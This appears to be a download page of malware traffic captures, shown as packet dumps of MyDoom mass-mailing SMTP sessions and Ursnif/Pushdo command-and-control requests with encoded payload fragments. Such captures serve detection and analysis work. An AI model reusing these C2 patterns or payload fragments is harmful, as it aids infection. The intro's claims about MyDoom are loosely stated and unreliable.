Text Example

MyDoom DDoS $38 Billion Dollar P2P Malware Botnet PCAP Download Traffic Sample

MyDoom Botnet

MyDoom has several methods of impacts, but main attacks are DDOS
MyDoom uses DGA for its P2P communications but also some Command and Control Server

Damage of an estimated $38.7 billion was caused by the fastest spreading malware Mydoom to Microsoft Windows-based computers. Spyware is a deadly malware that extracts a company’s confidential information without awareness of the company.

2019-07-15 13:00:22.289866 IP 10.7.15.101.51171 > 10.7.15.1.53: 48767+ MX? acm.org. (25)
E..5……..
..e
……5.!X…………..acm.org…..
2019-07-15 13:00:22.340366 IP 10.7.15.1.53 > 10.7.15.101.51171: 48767 1/0/0 MX mail.mailroute.net. 10 (59)
E..W…….G

..e.5…C……………acm.org………………
.mail mailroute.net.
2019-07-15 13:00:22.348650 IP 10.7.15.101.53658 > 10.7.15.1.53: 65013+ A? mail.mailroute.net. (36)
E..@……..
..e
……5.,$_………….mail mailroute.net…..
2019-07-15 13:00:22.382026 IP 10.7.15.1.53 > 10.7.15.101.53658: 65013 2/0/0 A 199.89.1.120, A 199.89.3.120 (68)
E.........= ... ..e.5...L...............mail mailroute.net..................Y.x.............Y.x 2019-07-15 13:00:22.382637 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [S], seq 3423424506, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4..@..... ..e.Y.x......O....... ................. 2019-07-15 13:00:22.501570 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [S.], seq 2591540629, ack 3423424507, win 64240, options [mss 1460], length 0 E..,......O..Y.x ..e.....w....O.…~…….
2019-07-15 13:00:22.501779 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:22.824195 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [P.], seq 1:66, ack 1, win 64240, length 65: SMTP: 220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled
E..i……Ot.Y.x
..e…..w….O.P…5…220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled

2019-07-15 13:00:22.928682 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 66, win 64175, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:24.456432 IP 10.7.15.101.49164 > 157.130.29.226.1042: Flags [S], seq 824150712, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…%;
..e……..1……… ..I…………..
2019-07-15 13:00:24.924489 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….}
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:24.988231 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….{
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:25.049108 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….z
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:25.112279 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….y
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:25.174765 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=……..
..e
……5.)[u.G………..libreoffice.org…..
2019-07-15 13:00:25.237468 IP 10.7.15.101.50685 > 10.7.15.1.53: 56734+ MX? libreoffice.org. (33)
E..=…….~
..e
……5.)……………libreoffice.org…..
2019-07-15 13:00:25.939540 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….w
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:26.001128 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….u
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:26.062827 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
E..D…….t
..e
……5.0……………global.libreoffice.org…..
2019-07-15 13:00:26.126226 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
E..D…….s
..e
……5.09..d………..documentfoundation.org…..
2019-07-15 13:00:26.187392 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
E..=…….y
:
2019-07-15 13:00:30.460095 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 1:54, ack 1, win 64240, length 53: SMTP: 220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)
E..]…………
..e….]`.k…
P….h..220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:30.460605 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 1:15, ack 54, win 64187, length 14: SMTP: EHLO acm.org
E..6..@…..
..e………..
]`..P….T..EHLO acm.org

2019-07-15 13:00:30.460715 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 15, win 64240, length 0
E..(…………
..e….]......P....n.. 2019-07-15 13:00:30.541199 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [S.], seq 678655145, ack 2272612538, win 64240, options [mss 1460], length 0 E..,......y.Y.D. ..e....(st..uP.………..
2019-07-15 13:00:30.541436 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [.], ack 1, win 64240, length 0
E..(..@…A.
..eY.D……uP.(st.P….R..
2019-07-15 13:00:30.601674 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 54:197, ack 15, win 64240, length 143: SMTP: 250-gabe.freedesktop.org
E……….?….
..e….]`……P…%]..250-gabe.freedesktop.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:30.602630 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 15:43, ack 197, win 64044, length 28: SMTP: MAIL FROM:fdrake@acm.org
E..D..@…..
..e…………]`./P..,QQ..MAIL FROM:fdrake@acm.org

2019-07-15 13:00:30.602753 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 43, win 64240, length 0
E..(…………
..e….]./...4P....... 2019-07-15 13:00:30.735767 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 197:211, ack 43, win 64240, length 14: SMTP: 250 2.1.0 Ok E..6............ ..e....]./…4P…nf..250 2.1.0 Ok

2019-07-15 13:00:30.736105 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 43:88, ack 211, win 64030, length 45: SMTP: RCPT TO:libreoffice@lists.freedesktop.org
E..U..@…..
..e………..4]`.=P…….RCPT TO:libreoffice@lists.freedesktop.org

2019-07-15 13:00:30.736205 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 88, win 64240, length 0
E..(…………
..e….]`.=…aP…….
2019-07-15 13:00:31.087379 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 1:62, ack 1, win 64240, length 61: SMTP: 220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)
E..e……y.Y.D.
..e….(st..uP.P…….220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:31.087804 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 1:30, ack 62, win 64179, length 29: SMTP: EHLO global.libreoffice.org
E..E..@…A.
..eY.D……uP.(st.P….l..EHLO global.libreoffice.org

2019-07-15 13:00:31.087907 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 30, win 64240, length 0
E..(……y.Y.D.
..e….(st..uP.P…….
2019-07-15 13:00:31.270207 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 62:203, ack 30, win 64240, length 141: SMTP: 250-vm194.documentfoundation.org
E………y9Y.D.
..e….(st..uP.P…….250-vm194.documentfoundation.org
250-PIPELINING
250-SIZE 41943040
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:31.271261 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 30:77, ack 203, win 64038, length 47: SMTP: MAIL FROM:postmaster@global.libreoffice.org
E..W..@…A.
..eY.D……uP.(sutP..&….MAIL FROM:postmaster@global.libreoffice.org

2019-07-15 13:00:31.271380 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 77, win 64240, length 0
E..(……y.Y.D.
..e….(sut.uQ.P….<.. 2019-07-15 13:00:31.481963 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 203:217, ack 77, win 64240, length 14: SMTP: 250 2.1.0 Ok
E..6……y.Y.D.
..e….(sut.uQ.P…s…250 2.1.0 Ok

2019-07-15 13:00:31.482279 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 77:121, ack 217, win 64024, length 44: SMTP: RCPT TO:marketing@global.libreoffice.org
E..T..@…A.
..eY.D……uQ.(su.P….2..RCPT TO:marketing@global.libreoffice.org

2019-07-15 13:00:31.482382 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 121, win 64240, length 0
E..(……y.Y.D.
..e….(su..uQ2P…….
2019-07-15 13:00:31.686040 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 217:291, ack 121, win 64240, length 74: SMTP: 450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
E..r……yxY.D.
..e….(su..uQ2P….e..450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
2019-07-15 13:01:10.499434 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15417, win 64240, length 0
E..(……48.F(g
..e…;….D…P…]…
2019-07-15 13:01:10.499471 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15417:15490, ack 277, win 63964, length 73: SMTP: CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P
E..q.*@….C
..e.F(g.;..D…….P…….CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P

2019-07-15 13:01:10.499509 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15490, win 64240, length 0
E..(……47.F(g
..e…;….D..5P…]z..
2019-07-15 13:01:10.499581 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15490:15568, ack 277, win 63964, length 78: SMTP: E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9
E..v.+@….=
..e.F(g.;..D..5….P…FB..E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9

2019-07-15 13:01:10.499614 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15568, win 64240, length 0
E..(……46.F(g
..e…;….D…P…],..
2019-07-15 13:01:10.499657 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15568:15646, ack 277, win 63964, length 78: SMTP: VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo
E..v.,@….<
..e.F(g.;..D…….P….*..VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo

2019-07-15 13:01:10.499691 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15646, win 64240, length 0
E..(……45.F(g
..e…;….D…P……
2019-07-15 13:01:10.499734 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15646:15724, ack 277, win 63964, length 78: SMTP: ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb
E..v.-@….;
..e.F(g.;..D…….P….O..ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb

2019-07-15 13:01:10.499767 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15724, win 64240, length 0
E..(……44.F(g
..e…;….D…P……
2019-07-15 13:01:10.499810 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15724:15803, ack 277, win 63964, length 79: SMTP: 2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D
E..w..@….9
..e.F(g.;..D…….P…l…2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D

2019-07-15 13:01:10.499843 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15803, win 64240, length 0
E..(……43.F(g
..e…;….D..nP…\A..
2019-07-15 13:01:10.499885 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15803:15852, ack 277, win 63964, length 49: SMTP: Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY
E..Y./@….V
..e.F(g.;..D..n….P…….Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY

2019-07-15 13:01:10.499919 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15852, win 64240, length 0
E..(……42.F(g
..e…;….D…P……
2019-07-15 13:01:10.499962 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15852:15874, ack 277, win 63964, length 22: SMTP: WwwouqTVQl4axZk+9NR8
E..>.0@….p
..e.F(g.;..D…….P….s..WwwouqTVQl4axZk+9NR8

2019-07-15 13:01:10.499995 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15874, win 64240, length 0
E..(……41.F(g
..e…;….D…P…[…
2019-07-15 13:01:10.500037 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15874:15886, ack 277, win 63964, length 12: SMTP: fFly N+umw
E..4.1@….y
..e.F(g.;..D…….P…….fFly N+umw

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
E….]@…C,
..e…q….r.Z…..P………..p…l..]=…A..}}.5T+…M%…$…Lr*,.6…./.5…
….. .
.2.8…….+…………..riuytessl.xyz.
…………..
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
E..(…….t…q
..e……..r.Z.P…EP..
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382
E…………..q
..e……..r.Z.P………..]…Y..]?#Ny.8…..-…. i………!a.. .BAB…..i.PQ.?Qa&..K….’.6z…………………………………i0..e0..M……..y@.TCg.,..Xc.oo
.0.. *.H……..0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30…190719142342Z..191017142342Z0.1.0…U….riuytessl.xyz0..”0.. .H………….0.. ……….(C.9.U.k…..j.C.U.6..|a….k…M.. …...”q….O..q..V.g4.k.i….:?….(……………….+G..I.u..]k..3…..<….au..].L’xLh…..#9q.r.k……?.fCib..4[}P……p……Y.U..y.:..i……p..Zt5s}. .z]A@azl.t..D..X….dVU..Rcp.o.l!..^,.1.1…q…….Mn.. ..Vl..5…….U0S’.y?…….>hr…7…..=.. .k!TS_n.UE#N……F.dvi…ws….Q….#\PT.06…..+1.Y.g.?W.o-…#%,[..U….P.7….DMe…….|e.Z..-0….F9H….j./…Zj.]… VJ…~.ayy..Ny;h.u.i.’.{U3$c…………&.5c|……6……9. …..X.)py.………….u0..q0…U………..0…U.%..0…+………+…….0…U…….0.0…U……:.$’.UF.W.x.*.h&….0…U.#..0….Jjc.}….9..Ee…..0o..+……..c0a0…+…..0..”http://ocsp.int-x3.letsencrypt.org0/..+…..0..#http://cert.int-x3.letsencrypt.org/0+..U…$0″..riuytessl.xyz..www.riuytessl.xyz0L..U. .E0C0…g…..07..+……….0(0&..+………http://cps.letsencrypt.org0…. +…..y…………v.oSv.1.1…..Q..w…….)…..7…..l ..c…..G0E.!…..T..X.LB……..~Z.…V….. .+/.|Ri.e….5.…vO..w../.]….v.) 10.7.29.101.49158: Flags [.], seq 1383:2843, ack 118, win 64240, length 1460
E…………..q
..e…….xr.Z.P…….r……EG.x…l
..>…..G0E.!…..lh…..F…P…….w..<.l0… T<..y..T.2Q +..Q.p…3_>.#%.z!.E0.. *.H………….Q.>=-J..’p.!.7W……X..q.WTx…..i8<...kc6…….D.O…….3…>…i.RRx.5<.….]../..1.T..A f..&..4.Q…:.6j.NR…./x.9….J…5Me..V}h..e….=.G….{………d.O….3E.?.VG..e0……1…..$…?.bp..Gw…h..).., mZ3…….!;.X…Q/..d…y…|…f….o…0…0..z…….
.AB…S.sj…..0.. *.H……..0?1$0″..U.
..Digital Signature Trust Co.1.0…U….DST Root CA X30…160317164046Z..210317164046Z0J1.0 ..U….US1.0…U.
..Let’s Encrypt1#0!..U….Let’s Encrypt Authority X30..”0.. *.H………….0..
………Z..G.r]7..hc0..5&.%…5.p./..KA….5.X...h….u….bq.y........xgq.i........B…tg…..Ra..?e…….V…..?…….k…}.+.e…6u.k.J…Ix/..O* %)..t..1..18….3.C….0..y1.=-6….3j.91……d.3…)…..}……….}0..y0…U…….0…….0…U………..0…+……..s0q02..+…..0..&http://isrg.trustid.ocsp.identrust.com0;..+…..0../http://apps.identrust.com/roots/dstrootcax3.p7c0…U.#..0…….{,q…K.u…`…0T..U. .M0K0…g…..0?..+……….000…+……..”http://cps.root-x1.letsencrypt.org0<..U…50301./.-.+http://crl.identrust.com/DSTROOTCAX3CRL.crl0…U…….Jjc.}….9..Ee…..0.. .H…………..3…cX8…. U.vV.pH.iG'{.$…Z.J.)7$tQ.bh…pg….N(Q………Z……j.j.>W#….b…….?. H….eb..T… ………2…w..ye.+.(.:.R..R.._….3.wl.@.2…\A.tl[]

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
E….*@…..
..e(L… .P.YQ.8.+9P…7F..GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
E..(……Aw(L..
..e.P. 8.+9.YS.P…….
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
E..l……@2(L..
..e.P. 8.+9.YS.P…….HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
E…..@…
}
..e…..R.P..V_q5s8P…K…GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
E..(…………
..e.P.Rq5s8..X.P…2…
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
E……….2….
..e.P.Rq5s8..X.P…P…HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

355bc
07rwzN1wxvCWd3rBZRqevWWzLIsTvybdCsmwzeaaULAyy2Vy5oxxe1cX92MOCxC3ZQTo+1KHvKoqvNbCRp1xBSQZTNLReURGb8kNYH3+8JtR8xL9OmBF7Sm/4WIsuKzpacR1VqJIEIpbeNx3KLC8sqndJlMp07IoHValNX47uHFm2hY9H28QPgnMGW+y9HkcEMwdFh+E3yHoii4dzyrQnnpFFowy7pEoy1GQO5EW5bz2uxuUSAK3qJyHs5kVuNTpQP0qKUc9EjlEPFRjKCajoaxKEWSPD+f/45g1i9cS2dIGrp3t/IgmKbTYOLte8un43nqCF4gLuN5SV0ONquYbjiqVdU38jEYkwcxmgWnXlKoLGw3rSLlac1VA8oYQ7d/5KgBKPbCf6gJ+dyTcqSPQ9Spaiz5Dq69spM35RwwgGB2rGBAncEha02GnOidGumIJx+If+d0NJyTd51Q2dFLqGzg5WiQGQo+udLo7vaI/KUvvObs+1io0BRFa2X+rAbzGx6sLk4fI9ts/9IemiGl+szT83n4mExS1zP5QI8in/b0Qy79VKc1R3mYvm/J0GM6HJem8IJFH5BJqjrCOMerjG1hg6QSXk5AVOTIGezTaUMGVY5o+JvaDRxcOv/zhRKIx5qpeTYd+u2gExUdiOOMj7hqHAWn1DS0KiUJ7cjvniv+0En98QSv3wbZOO8ksFLa5new6152uNXX5lC2lAk/NgwHOWmt7cN074ASQ0GTAcoGsGRDL1WLTcZ7SNu8SUGIIo55/M7y7Ag4ITRqB95grEqHAtCNhliKrOEy1bn4GpZ9NG2Do2W
2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
E..(..@….0
..e…..R.P..X.q5x.P…2…
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5x…X.P…H;..+QWA0tM0QdVuPkhswOFzlmPHTuY9CN2QDsWi1bIKzwR6vkhZ7KAwMVY1i48tC164mEm0z0RZNf+IrD3TPDZU5mRtCAqPy/I1zqVQaeBPpHhJwl+YI20OIHCOPQg94BqaoFvWP6ArUig5deAw5awc0Xts9xFKYpUGKmEC0nGwqHQP3UBzpcIvlrSTYLwh3/MtpScYFthdHNb/bld1mXgaGAZ5E6m0Tj4yVcrZSvFi+CNIrIsNhK9RIVbl9Ij3MeRiXBLXoabyasQ+tPADbSrKe+QgVog2pEtsi1XzNXvd0OFjkLfmduBJm/3GQZsjUczuEUF2vCPq0v6vzqqAuDGs1fwCcqe9j1vnzH8Msf+ElPuMloNmSBkdUloQMDJbKbskU5D00aW/DAh/MyzVoh496ITtuywkrC1hFf6bLRucFXSqL/IWjxK8n+LsEsoKxCYnd5MjlPnN7B6FrQg4BS6A4V9BLg8wDOp1hY/aNO/gSnnzcxoBWru+QrXQ+8iWoqv90qyEg9XNo/FwGHle7/3Uo1ES0lffJYr0lINt59NvSSNUaTgHItVymhKNOhPehcLPhHeHYI/g+/AIBpc92VIQLHzF3qe3kOLfQnUe8+AgI4sPKcpgPrNTdJ8alc/OTYDrcPLoLIS9cR5MH1kLuTZFgnFRFbwVnSZBn9Kd9LyUWjwWxH8wNJ3FYwyEMFszvvuucEqgTz8j2THI82rKE42DFtRG3uoH3FbToEnYVfUhBYe/NLyjgeMR38DVP3D4NxGcK64otXkReWSRU8YB7yUD7Y1jokacBnOPhnCdB5C3XJNcsPukxmHpCSg2pO3XOBxe2i+3iTUIIOGZtyhFKE5fkXcDmF0kS4vKakFkWC3TOYKT1kfidos6AU49cBx2OCIi+4KymAGygCmX5LiUbjZDT53qE12p7nFFPQou5/OwCHqUZLxw2zKOuCaSWzDfnfulRNe+V0ZjDCun794hdPLUXbX4SSTcaXcjwDSL+NFKFQ1L+eAaSGc9xlY+8LxzstSs7BWSMtPm3fGbKfEClnSLZOK2jhDJNgqbx9Bfil/6pkI3SoIL5g76ezoHhJUoDSzk70NJdSXoDMnXcP/FOjQzTGgHmDLIH1lpcBlC9baxvXK8a8N2ip33O+1iSyjBZ6hTLPdVTbmk9Xg0pz7Q5dhJ4IBEPQ9eo+xlm+CHI9ZAYQ7h01Kzvialrsfe+8ilK+aNZ6PDpN74yqn8CnsS5xazdBEKG7n2jXPRl+FOxsGVE0luECxROi/K/rHf76pNTsS+6N67jydO+HMvrpXAXvPHZQkQ9lkdjwPqbEubmReoPl4AyE7ksSS1ZOgnqsv6zgQePZkSCuIbN6MWfnMg5h1IjaV4IWTKwhZDUCgaqBRrPtEepmhL3fQ5TlAsF+6xbGFzx3nsAUlOB/k5IdzxeHF6aHRJcVqdcaNOujgaeawDPsEqAGmr4/w3
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP
E……………
..e.P.Rq5~R..X.P….N..00maCBUypMWFQxMSDyrILJZUIfW1V6PnFnBZZGFQBlwGrD0w8eyrfi5KVKY/UYmAlg9Ob6AQz9sL9fOgrac2mScpFFDqx8B6tWHUfO5DZ3gKXe+Hq+WMsUMbuFbH4dlYsezuo0hnHniNRpAAuCxYEyn19E7xebnKJBp16rwB3LbP2OhwpoEhPtVNVYc+eFMNA9JBQ1mk9F/Lkbookgz2Q5ZQOmpbnpqagQWQloutSYu5u5NM+HTtNVZAns1V6xGnexCjeeTeI748NKWmdvW8wuHAMBdvJzNzLdaCLfmbCbkT7YnLcpkMHxRSp/pwaA/k0SIcUvKAR+4uKFKgKK2V1yQVlULPL55w+qR1YZj7s/vRsDHK9iqGXDRjwRauMqEj6aJabMYH8tcGz92o0DU+XaiHN1THg8hXQnsIVFcdrvdy3DgrSYwaX6SB6wj16vyc6uAbaOwY58TZNe7jRSyrxIHd+TnVGYbX0B7t9tM315IQ/8UVYHVJ7OTc5J06epbpzHZsY5VlXVrhvbp/LnCEWQCUSMVKI/v9fHljQO4z0w9PDWrrxsVetWxcDVSvPamcxg+hkx+wGmV3SmQg8EegO8qKFpfap/hgCJd4EuBFdfkKDWd7iqsWch1bcFAO2Kk5wnnqoivftNH6vLKYMtYGquVpeZDRzbxaa3et1XwiDEy6wGSBHvPARqq7sTo4HRjDYf1slg2PW0HsNnzDNaV7lPOPyBJi8W6dyvK/qKDnMa7yDE/CInmaHNIFErWXF3YG2y2w8LgTmcShVD9C/4eC4NRjFkRAmIO2pRFdIw1la1hvbPz9SGW80OMT16T70/nw4o5NT45C7bnPgl6Li7TXnvCLEcZPo38aoPzngVX5mGpLxWQO65W8Nn63qwJFMvOHfPL4UXxSDrs/od9I1griPceSIbBwDxWykgRRa3RmM7oA3nqlSFp0AMLWlT50DgcQILDGkuoAmcOk2mFPDbUuY70VUEcURbbEwt7ZRbCzgD1GzDQdHYL2dwswXxmp22xWLUYRHJE0U9O7CAqS/H69b3KaJ7vBI/B7TSXGJ3XZ9g